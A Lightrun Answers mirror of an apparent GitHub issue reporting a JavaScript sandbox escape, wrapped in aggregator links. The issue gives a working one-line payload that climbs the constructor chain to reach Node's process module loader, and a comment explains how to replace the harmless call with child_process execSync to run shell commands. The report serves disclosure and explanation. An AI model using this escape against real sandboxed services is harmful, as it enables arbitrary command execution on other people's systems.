Stuck on an issue?
Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Sandbox can be broken.
See original GitHub issueUsing functions and constructors, its possible to escape the sandbox to get process, which can be used to get require that can be used for evil things like a reverse shell.
Code:
new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")
A, I hope, more readable (because of how hacky the thing is its difficult) version:
new Function("
return (
this.constructor.constructor('
return (this.process.mainModule.constructor._load
)'
)())"
)()
("util").inspect("hi")
Issue Analytics
- State:
- Created 7 years ago
- Reactions:4
- Comments:18 (1 by maintainers)
Top Results From Across the Web
How to reinstall a broken sandbox - CloudBlue
CloudBlue · Question · Answer · Note that your sandbox will be destroyed and then redeployed from scratch and all data stored in...
Read more >[Bug on PC] Sandbox mode seems to be broken - Reddit
So I just finished the campain and thought I would try some sandbox. I encountered two major bugs : - When I started...
Read more >Does anything have an ability to break out of the sandbox?
Yes, you can definitely cause harm from a sandbox, especially in a full sandbox. You could trigger an integration with sandbox data, ...
Read more >Help window sandbox broken not load up after I run virus!
This thread is locked. You can follow the question or vote as helpful, but you cannot reply to this thread. I have the...
Read more >Sandbox testing broken in iOS 11 | Apple Developer Forums
Thanks for the tip, PBK. I did not think the testing process would be much different when using TestFlight, but it sounds like...
Read more >
Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free
Top Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
i’ve been playing with compiling a javascript engine to wasm, which seems to be a good way to execute javascript securely:
and here’s the code example from the initial issue:
@sand1er the code does the following:
Escape the context by using constructors, because the objects still have constructors you can use to go out, because the constructor of
thisis Object and the constructor of Object is Function, you can use that Function to make a function that runs in a new context that has the process variableUse process variable to access require-like function (process.mainModule’s constructor is module that has _load which can do things similar )
Imports a module and runs commands. The example just imports utils and inspects
"hi"Buy you could run commands by replacing
("util").inspect("hi")with("child_process").execSync("id")for example (to run the commandid)You should think
new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()as require.I found a very similar thing in another major sandbox (sandcastle) https://github.com/bcoe/sandcastle/issues/70 hopefully all the people who download this modules don’t use it for production or something. I basically ended up making my own sandbox… (which I don’t want to advertise here)
Feel free to ask more questions if you don’t understand something.